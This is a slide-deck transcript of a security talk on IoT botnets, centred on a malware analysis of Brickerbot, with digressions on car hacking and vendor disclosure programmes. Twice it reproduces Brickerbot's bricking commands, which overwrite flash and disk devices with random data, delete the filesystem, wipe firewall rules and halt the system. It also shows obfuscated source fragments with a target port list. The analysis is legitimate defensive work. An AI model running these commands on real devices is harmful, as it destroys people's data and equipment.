  • 15. Brickerbot: Source code - Strings, bricking 1. ii11II += 2. '''busybox route del default 3. cat /dev/urandom >/dev/mtdblock0 & 4. cat /dev/urandom >/dev/mtdblock1 & 5. cat /dev/urandom >/dev/mtdblock2 & 6. cat /dev/urandom >/dev/mtdblock3 & 7. cat /dev/urandom >/dev/mtdblock4 & 8. cat /dev/urandom >/dev/mtdblock5 & 9. cat /dev/urandom >/dev/mmcblk0 & 10. cat /dev/urandom >/dev/mmcblk0p9 & 11. cat /dev/urandom >/dev/mmcblk0p12 & 12. cat /dev/urandom >/dev/mmcblk0p13 & 13. cat /dev/urandom >/dev/root & 14. cat /dev/urandom >/dev/mmcblk0p8 & 15. cat /dev/urandom >/dev/mmcblk0p16 & 16. ''' 17. ii11II += 18. '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null & 19. iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP 20. halt -n -f 21. reboot 22. '''
  • 17. “Zombie” cars - “It’s Zombie time.” We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
  • 18. “Zombie” cars So in order to stop Criminals from hijacking our cars and turning them into bombs...
  • 20. Security: Gaining industry buy-in; Doing it right?
  • 21. Security: Gaining industry buy-in; Doing it right 1. Get someone credible to organize/liaise with industry players a. Renderman 2. Provide guidelines for disclosure to vendors 3. Provide guidelines for communication with researchers 4. Suggest/provide solutions a. Mostly suggest. Nobody’s using provided code. 5. Branding a. Internet of Dongs Project b. DVEs(Dong Vulnerability and Exposures)
  • 23. Brick all the Internet of Things!!: We want to make things more secure, right? Jimmy Shah
  • 24. Disclaimers ● The views, opinions, and positions expressed in this presentation are solely those of the author ● They do not necessarily represent the views and opinions of my employer and do not constitute or imply any endorsement or recommendation from my employer
  • 25. Nixon is a great security researcher and I agree wholeheartedly with the first half of this statement. Attackers are using botnets primarily for profit. Distributed Denial of Service(DDOS) as a primary source of income. I respectfully disagree with the idea that the only solution is to turn to law enforcement. Unfortunately while Law enforcement has great powers of investigation and response after the fact, there are still a number of steps we can take to prevent attacks. Ultimately, what’s going with these IoT botnets is crime. People are talking about these cybersecurity problems — problems with the devices, etc. — but at the end of the day it’s crime and private citizens don’t have the power to make these bad actors stop. — Allison Nixon, Director of Security Research Flashpoint Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018. https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
  • 26. Attackers exploiting botnets to perform large scale DDOSes has become common. Bots, or Robots or Zombies, whatever are nodes in a network of malicious machines. Traditionally attackers either infected machines with malware or on a less automated fashion convince users to perform like bots. LOIC is an example of software that allows users to participate in a DDOS. This is the simplest technique where each user is independent but collaborates with a multitude of like minded users. Imagine a hundred thousand individuals each with a single rifle all aiming at the same target. Some will miss. Some rifles will misfire. Some will never understand how to fire a bullet. Regardless a majority will hit the target. Of course the efficiency of such an attack is much less than one that eliminates human error. Infecting numerous bots is sometimes only the first step. An attacker with hundreds of thousands or millions of bots needs to do something with them. They make no money lying idle. This is where another traditional technique is used, DOSaaS(Denial of Service as a Service). I have a botnet, you pay me to take your target down, we all profit. Except the major site we’ve just knocked down. DDOS ● Traditional ○ What’s a bot? ■ Robots, zombies, etc. ■ Nodes in a network of malicious machines ○ Attacker convinces/infects normal users to become bots ○ Attacker sends commands to DOS a victim site ○ Profit ● Also Traditional, but DOSaaS ○ Attacker buys/rents bots ○ Same as the above
  • 27. Attackers are looking to make a profit. The usual methods work, but they can be costly. There is a need to purchase or develop one own’s malware to build up one’s botnet. IoT botnets help to reduce those costs. Several IoT botnets have had their source code released by their authors. Turns out security on IoT devices is severely lacking. No traffic control, no firewalls, no real authentication. Default credentials. Let me repeat that, default username/password combinations that users can’t easily change. Mirai made the big splash, using a long list of default credentials to log in to embedded devices and then turning them into bots. Having a list of default creds is useful, but more benevolent trespassers on one’s internet enabled cameras and home routers can also use the same in order to log in and patch your systems. Linux.Wifatch s famous for being a worm that connects to IoT devices and patches them, locking out the bad guys. Linux.Hajime does something similar, locking down ports preventing other botnets from connecting. As another show of good faith the authors of Linux.Wifatch released the source code to their patching worm.[1] Good or bad, none of these worms would gain as much traction amongst IoT devices if it were possible to modify logins. [1] https://gitlab.com/rav7teif/linux.wifatch DDOS via IoT Botnet ● Similar to DDOSaaS ○ Except the bots are free ■ Even more free? Due to default creds. Mirai Linux.Wifatch Linux.Hajime
  • 28. Right so, Brickerbot. Where Wifatch and Hajime do their part in securing devices by changing passwords or disabling outside access, Brickerbot goes about it in a slightly different manner. If we just brick all of these vulnerable IoT devices they can’t be turned against us. Great idea. Mudge, of L0pht and DARPA, has heard about this idea too. From reasonable folks in the Intelligence Community and the Department of Defense. These are kind of the folks who get to take direct action. Except it seems even they couldn’t get away with bricking the devices of civilians in the US and all over the world. So, Brickerbot?
  • 29. The author of Brickerbot calls himself The Doctor. He has also posted on an underground forum as ‘Janitor’. Sometimes attribution is easy, like when an actor directly connects online identities or claims credit. Attribution is harder when all you have is the end result such as a binary or obfuscated script. A source code release like the authors of Linux.Wifatch did is a primary method of claiming authorship. Releasing an obfuscated script that doesn’t or cannot execute is like showing off portions of a wrecked fighter aircraft with any and all markings or identifying information missing/removed. It makes for a great showpiece and allows one to take or (more often)give credit. Other researchers suggest that some of the attacks that The Doctor claimed, such as one on a major mobile carrier’s network, were not performed by him or at least not using any of the exploits contained in Brickerbot. Do we just take the word of whichever party we have a greater trust in? Minus a release of source or of forensic results from various attacks it seems that’s the default position. Where are we? 1) We may not be able to trust Brickerbot’s ‘author’ 2) The publicly available sample is essentially an obfuscated list of exploits and ‘bricking’ code 3) We need to examine the Brickerbot code a little closer to see what we have
  • 30. Bricking is just turning useful devices into something as useful as a brick. This a perfectly legal action that one can perform on devices that one owns. When done to others, it is almost always illegal and occasionally an act of war. To be clear, Brickerbot is intended to operate entirely on others’ devices. So, Brickerbot? ● What’s bricking? ○ Turning a useful device into something as useful as a ‘brick’
  • 31. Normally coming from the malware analysis side, I’m loath to help spread malware. In this case, the cat is out of the bag, the horses have left the barn, and there are dozens of pastebin like sites and one or two github accounts with a copy of the released Brickerbot script. So if you would like a copy of the script in order to play along at home/analyze just google for the following line. Brickerbot: source code ● Want a copy of Brickerbot? ○ Google ■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1” ● Mirrored on github and various pastebin like sites
  • 32. A quick aside about the malware analysis process. Assuming you’re not doing it as a hobby it’s almost always performed under pressure. One never has enough time to do a complete teardown, to check every nook and cranny of a given target. You may love puzzles and even enjoy completely solving them, but you never have that time at work. When you eventually do, it’s known as that nearly mythical time period ‘vacation’. An analyst always has to deal with multiple competing pressures from various interested parties. In no particular order: ● Customers ● Bosses/Upper Management ● Competitors ● Press Depending on how one receives a sample one or more of these will be aware and the clock starts ticking. One won’t always satisfy all parties. Regardless, handling the various competing interests is the job. Ok you don’t have unlimited time. A customer is under attack. The press is minutes from publishing. Higher ups are yelling at your boss for an update. What do you do? Generally one searches for IOCs(Indicators of Compromise). It really does become: What is the least I need to see before I know my home/office/business is irrecoverable? Aside: Malware analysis process - under pressure ● Not always enough time ○ fully unwind and solve every aspect of every puzzle within a sample ■ That’s called ‘vacation’ ● Interested parties breathing down analysts’ necks ○ Customers, bosses, competitors, press ■ Handling these is ‘the job’ ● Identify IOCs(Indicators of Compromise) ○ What is the least I need to see before I know my home/office/business is irrecoverable?
  • 33. What has The Doctor dropped in our collective laps? We’ve got a script that appears obfuscated. No line listing the interpreter the shell should use. First steps for analyzing this malware: 1) Let’s see if it runs a) Make sure the VM has no network access b) Include possible runtimes(pyhton2, python3) Shocker! It doesn't run. Why? Running with Python3 fails. Mainly due to the print statement becoming a function in Python 3. Thus we know it’s python 2. Running under Python 2 it fails. Symbol not found. In this case due to additional whitespace turning a function call into an undefined symbol. Next, we need to remove extraneous whitespace. Re-run and it fails again. This time due to not a single library being imported. You have to be kidding me. The script as provided was never intended to run. 2) Maybe de-obfuscating the script would simplify the analysis ● writing a custom de-obfuscator is a good solution, unfortunately it’s a vacation project. We’ve still got a job to do. • It’s good to get acquainted with tokenizer.py for that eventual vacation ● We can still write a one-off script to quickly remove dead code. Dead code being things like If statements that are always false, or statements Brickerbot: Getting to the heart of the issue ● Malware analysis ○ Get it running(VM, python(s), no network) ■ Nope, bad interp. Python2 ■ Nope, symbol not found. ‘Extra’ whitespace. ■ Nope, libraries not imported. Enough nonsense. ○ De-obfuscate ■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’. ● (still, become friends with tokenizer.py) ■ Custom script to remove dead code ● Become friends with PyLint ■ Pretty-print remainder of source
  • 34. Now you’ve figured it’s non-functional. Now its time to find all low hanging fruit. In this case, the author provided the initial hint. Suggesting that one could just check the unencrypted/unobfuscated strings. One of the first steps in statically analyzing all malware is to extract all strings. Really. Some of the best clues for attribution come from identifiers left in the code, or shout- outs to colleagues or malware researchers. Egos have led to a number of malware authors getting convicted. In the case of Brickerbot, the simple obfuscation used by the author removes all identifiers(i.e. variable names, messages, etc.). It’s more about not having it tied back to the author than making it difficult to learn how the worm operates. Another time-saver used in analysis is to read other analysts’ reports. This lets you see if you’ve missed anything important(e.g. malware emailing all your contacts). It also lets you re-direct analysis to portions of the malware not yet analyzed or to specific payloads. With Brickerbot, since it won’t run and there’s much useless code an analyst can look at it as a container for various IoT device exploits Brickerbot: Getting to the heart of the issue,cont. ● Malware analysis ○ Examine low-hanging fruit ■ Strings ● Seriously ● First step used by malware analysts ■ Read reports by other analysts ● Catch what you missed/ran out of time to find ● Re-prioritize resources towards areas that have greatest impact
  • 35. Let’s look at the Brickerbot source code. Random, similar looking variable names, more whitespace than necessary. This looks horrible. The if statements where the conditional is equivalent to 0 will never run the code that follows. Dead code. There are spaces in function calls. These don’t even help readability so the sleep call on line 7 isn’t actually a .sleep() call, it’s just the undefined symbol time a dot and the undefined symbol sleep. Much of this can be removed as described earlier with a custom script to delete all dead code. Brickerbot: Source code - obfusc., ex. whitespace 1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI 2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00 3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo 4. if 21 - 21: Oooo - I11I1Ii 5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO 6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO 7. time . sleep ( 3 ) 8. if 20 - 20: Oo0 9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1 10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1 11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO 12. if 84 - 84: I11I1Ii * Ii11i1iIi 13. I1IiI1I1 = OOo0O0oOOOO 14. if 4 - 4: Oooo + oOOo0000o 15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0 16. i111IIIiII1i = False 17. Oo0O00OOooO = False 18. IiiI1 = False 19. oOI11IIIi1II111 = True 20. iiIII11I1i1Ii = True 21. I1i = True 22. i11iiiIi = True 23. i1iii = True 24. OOoOo00oO0 = True 25. OO00oo0o = True 26. if 5 - 5: IIiII + O0oo - i1 27. if 52 - 52: oOoO0Ooo / Ii / Ii 28. if 24 - 24: oOOoO00oo0 29. i11 = [ ] 30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ] 31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
  • 36. Ok, now things are looking a bit cleaner, we can see functions. Names that have been obfuscated are lost, but one can eventually rename them according to their function. Similar to what one does with functions in an unknown binary. This is also after pretty-printing the script so that we get rid of the excessive/additional whitespace. Also like mentioned earlier, no libraries are imported so the code still won’t run. You should be getting a better picture of the roadblocks placed in the code. Brickerbot: Source code - eliminate dead code 1. def IIi1IIii11I1I(targetip, targetport): 2. global i1Iiii1i11i 3. O0000oO0O = (targetip, int(targetport)) 4. I11i1I = hash(O0000oO0O) 5. if I11i1I in iIIiii11Ii1: 6. return 7. IiI1i1ii1[I11i1I] = 0 8. ooOo0I1ii1i[I11i1I] = (targetip, int(targetport)) 9. oo0[I11i1I] = time.time() + i1Iiii1i11i * 60 10. iIoO000oO[I11i1I] = None 11. iIIiii11Ii1.append(I11i1I) 12. 13. def i1iiiiIi(targetip, targetport, jobhash): 14. O0000oO0O = (targetip, int(targetport)) 15. O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16. O0OOo00o00o.setblocking(0) 17. try: 18. O0OOo00o00o.connect(O0000oO0O) 19. except: 20. pass 21. I11i1I = hash(O0OOo00o00o) 22. O00OiiI1iIiiI.append(O0OOo00o00o) 23. Oooo0[I11i1I] = (targetip, int(targetport)) 24. Iii1iiiI[I11i1I] = 0 25. i1I11IIIIIi[I11i1I] = time.time() 26. I1iiO000o00o0[I11i1I] = jobhash 27. iIoO000oO[jobhash] = O0OOo00o00o 28. return O0OOo00o00o
  • 37. Now we can go back to step 1 of the static malware analysis process, searching for strings. This particular segment includes commands that overwrite storage on a particular device with random data. Routes and firewall rules are cleared from memory and deleted. Then the system is stopped and rebooted. By now there should be no code left to run so your home router is now useless. So what do we know now? 1) this code is annoying 2) so is The doctor 3) all devices with the default username and password will get disabled permanently 4) Vulnerable devices are fixed now, since they can’t work they’re safe So smaller IoT/embedded devices are quite vulnerable and badly secured. Do bigger embedded systems and Internet connected devices face similar threats? Can a brickerbot for my washing machine be much far away? Would other larger devices be more vulnerable? Say my car? Brickerbot: Source code - Strings, bricking 1. ii11II += 2. '''busybox route del default 3. cat /dev/urandom >/dev/mtdblock0 & 4. cat /dev/urandom >/dev/mtdblock1 & 5. cat /dev/urandom >/dev/mtdblock2 & 6. cat /dev/urandom >/dev/mtdblock3 & 7. cat /dev/urandom >/dev/mtdblock4 & 8. cat /dev/urandom >/dev/mtdblock5 & 9. cat /dev/urandom >/dev/mmcblk0 & 10. cat /dev/urandom >/dev/mmcblk0p9 & 11. cat /dev/urandom >/dev/mmcblk0p12 & 12. cat /dev/urandom >/dev/mmcblk0p13 & 13. cat /dev/urandom >/dev/root & 14. cat /dev/urandom >/dev/mmcblk0p8 & 15. cat /dev/urandom >/dev/mmcblk0p16 & 16. ''' 17. ii11II += 18. '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null & 19. iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP 20. halt -n -f 21. reboot 22. '''
  • 38. What’s the worst that can happen to my car? Can it become part of a botnet? Let’s see what an expert on automotive security thinks. Charlie Miller is formerly of the NSA, but has made a name for himself in the private sector as a capable security researcher. Sorta reminds me of Star Trek’s Captain Picard, clever and wise. He wrote the first public exploits for Android and iOS, on the Google G1 and original iPhone. Later he and Chris Valasek received a grant from DARPA’s Cyber Fast Track program(the same one founded by Mudge) to research automotive security. So he moved on from hacking PCs, to hacking phones, to hacking the very cars you and I drive. And people complained, ‘but those aren’t remote exploits. You’ve got to be in the car to hack them. Any crook can do that.’ And verily, Charlie and Chris developed remote exploits. SO when Charlie says that 1) it’s not simple to hack all the cars 2) there aren’t as many people hacking cars you’d do well to believe him. “Zombie” cars
  • 39. Except movie hackers… If you’ve seen the seminal ‘Hackers’(1996) you know that “real” hackers can be determined by their hairstyles. Dreadlocks, in fact possibly being a necessary factor in successful cyber attacks. E.g. Matthew Lillard’s character Cereal Killer. As one can see Ms. Theron’s character, Cypher, must be quite the criminal hacker. After all, the main heroes in the film(Johnson,Diesel & Statham) lack both hair and computer skills. Realistically one can get a better sense of the threat posed by Cypher by viewing her environment. She is obviously well-funded(either State-backed or via independent fortune) and employs a full team of experts. Especially experts that can hack cars. When an underling tells her there are a couple thousand cars in the vicinity of her target, she orders him to hack all of them. Yes, all of them. Never mind the brand, the Telematics system, any and all firmware(or lack of such) within each of these thousands of automobiles. Those hacker dreads must confer some extreme hacking powers. “Zombie” cars - “It’s Zombie time.” We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
  • 40. We should just brick everybody's car in a 5 mile radius. It’s not like anyone needs to get to work, pick up their kids, drive a buddy to the hospital, drive for lyft/uber. Maybe they didn’t really need their personal cars. This goes back to the original idea of abdicating any responsibility as developers and manufacturers of IoT devices to Law Enforcement. Or in the case of The Doctor, to vigilantes. It's a common idea that fixing bugs at the earliest point in development is many times cheaper and less dangerous than patching them after release. Though we can’t always fix before customers take possession. It’s possible to release firmware updates and patches afterwards, but there is not always incentive to do so. The manufacturer of my car will occasionally release updates for the Telematics system living in my dash, but the manufacturer of my new Internet enabled Toaster might say it’s no longer supported. This is not usually a problem. Until attackers not as benevolent as the Wifatch and Hajime authors or Charlie & Chris will discover and exploit a vulnerability to turn your new Mustang into a torpedo. With Miller & Valasek I know they’ll make an effort to reach out to the manufacturer and enable a patch or update to be created. We can learn lessons from the way vulnerability reports are handled on other platforms. Embedded systems and IoT devices are not as dissimilar from desktop and server PCs as one would think. The same way security researchers reach out to Apple or Google for bugs in their phone OSes, they can reach out to various device manufacturers. “Zombie” cars So in order to stop Criminals from hijacking our cars and turning them into bombs...
  • 41. It can be difficult to get industry members to agree on issues like vulnerability disclosure, regular patching and in general working with outside security researchers. It is very much like the common description of ‘herding cats’. While many of the players may look similar and even share similar interests it is difficult to get them all to come to the table. Each company has no special reason to trust another. It usually takes commonly trusted individuals and backing from companies with greater resources just to begin the conversation. Fortunately we’re seeing motion towards that goal in a small subset of the Internet of Things/Internet-connected embedded devices. Security: Gaining industry buy-in
  • 42. Security: Gaining industry buy-in; Doing it right?
  • 43. How do we get all these cats eating peacefully at the same bowl? We can start by selecting someone credible and trusted widely as a focal point for the multitude of players. Get a Pied Piper that all the cats can turn towards. In this case that would be Renderman(Brad Haines), a well known and respected security researcher. He’s also a CISSP. Renderman has a wide range of experience with penetration testing, wireless security and computer security research. A published author and a speaker at numerous computer security(Black Hat USA) and hacker(Def Con) conferences. The interesting part of this is that Renderman is operating within the category of items that fall under the heading ‘Adult Sex Toys’ on Amazon.com. One might have expected that other personal IoT devices, such as fitness trackers, would be where more security research would occur. The recent information leak from Strava which showed running paths of US armed forces members is one such area of research. Here a personal IoT device’s lack of default security and privacy controls ends up violating Operational Security(OPSEC) at US bases around the world. The main threat is not the bases’ locations(arguably opposition forces and host countries already have that knowledge), but more that of current intelligence confirming activity at the bases and possibly number/names of active personnel. Renderman has accomplished something that those of us in other specialties(e.g. Antivirus/Anti-malware) haven’t, he’s managed to convince disparate manufacturers to trust him; both as a source of best security practices and as an interface to the wider community of vulnerability researchers and hackers. Security: Gaining industry buy-in; Doing it right 1. Get someone credible to organize/liaise with industry players a. Renderman 2. Provide guidelines for disclosure to vendors 3. Provide guidelines for communication with researchers 4. Suggest/provide solutions a. Mostly suggest. Nobody’s using provided code. 5. Branding a. Internet of Dongs Project b. DVEs(Dong Vulnerability and Exposures)
  • 44. Q: What sort of threat model are IoT vendors using? A: Good question. Default credentials implies there is no threat model. A basic threat model would take into account the simplest attacker, your common script kiddie. Take a dictionary of default credentials and list of target addresses and feed them to a scanner or ready made tool. Even after the number of in the wild IoT worms we’ve seen, the script kiddie would still end up with control of a significant number of IoT devices. Unfortunately security is currently at best an afterthought for a large number of vendors. A proper threat model would need to take into account attackers of various skill levels and budgets. Script kiddies might be kept at bay by simply allowing for users to easily change passwords. Or using public-key encryption to ensure firmware updates come only from the manufacturer. Which would also protect the device from script kiddies. Best practices in security will overall protect the bulk of users. If your threat model also includes Nation-State actors, then its likely your development budget is of a commensurate size. It would also need to consider the attack surface for a given device. Does it connect to the Internet? Is the firmware protected from modification? Can an attacker cause the Li ion batteries to overload/ignite? Is it possible to inject malicous traffic into the stream of commands sent to the device? Regardless, these are factors that need to be considered at the beginning of the development cycle and not once product is in the hands of consumers. Once there, it is considerably more expensive to mitigate(e.g by patching, or recalling devices). Questions?